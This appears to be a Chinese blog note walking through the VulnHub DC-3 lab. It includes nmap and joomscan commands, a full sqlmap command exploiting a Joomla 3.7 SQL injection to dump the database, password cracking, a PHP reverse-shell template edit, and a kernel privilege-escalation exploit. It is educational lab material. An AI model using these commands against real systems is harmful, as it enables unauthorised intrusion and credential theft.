vulnhub之dc3

各位师傅可直接移步至

https://blog.youkuaiyun.com/Aluxian_/article/details/123676768

查看此篇即可,本人只当做笔记,以理清逻辑关系
主机发现
nmap -sS 192.168.2.0/24
在这里插入图片描述

发现测试靶机的ip为192.168.2.107,进行端口扫描

nmap -p-  -A -T4 192.168.2.107

发现仅80端口开放

进行指纹识别

whatweb http://192.168.2.107 

在这里插入图片描述发现网站使用的框架为joomla,使用专属的joomlascan进行检测,
(中途更改了下环境,现在目标为192.168.43.131,本机ip为192.168.4.128)
打开相应界面
在这里插入图片描述使用joomlascan进行检测

perl joomscan.pl -u http://192.168.43.131

在这里插入图片描述并未检测到相关漏洞,但检测到了后台路径和joomla 3.7版本,谷歌大法
exdb上面有个sql注入,尝试利用

直接下载整个joomla数据库

sqlmap -u http://192.168.43.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml --risk=3 --level=5 --random-agent -D joomladb --dump-all -p list[fullordering]    

sqlmap会把生成的文件存在目录下
在这里插入图片描述到指定的位置打开csv,kali下直接双击即可,
在这里插入图片描述使用john爆破密码
在这里插入图片描述使用admin/snoopy登录后台
在这里插入图片描述
在这个trmplates菜单下可以修改自己的文件内容,我英文不好,百度了一下,找一下就可以

在这里插入图片描述这里选择下面一个,因为和首页的显示一样

在这里插入图片描述
使用msf生成php木马,复制全部内容替换index.php中的内容

在这里插入图片描述
设置监听获取shell

在这里插入图片描述为普通权限
在这里插入图片描述查看查看内核版本以及操作系统信息,又一次谷歌大法

在这里插入图片描述
根据操作系统版本和内核版本进行筛选,这里使用成功的最后一个,其实其他的都尝试过,均已失败告终,
使用科学上网,下载39772.zip,复制到kali虚拟机中,使用python开启简单http服务
在这里插入图片描述
dc3进行下载利用,
在这里插入图片描述
权限即可提升为root
换一种方法,使用Linux Exploit Suggester 2 进行检测
在这里插入图片ihou描述我之前测试的时候,使用gcc进行编译的时候,会出现报错

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值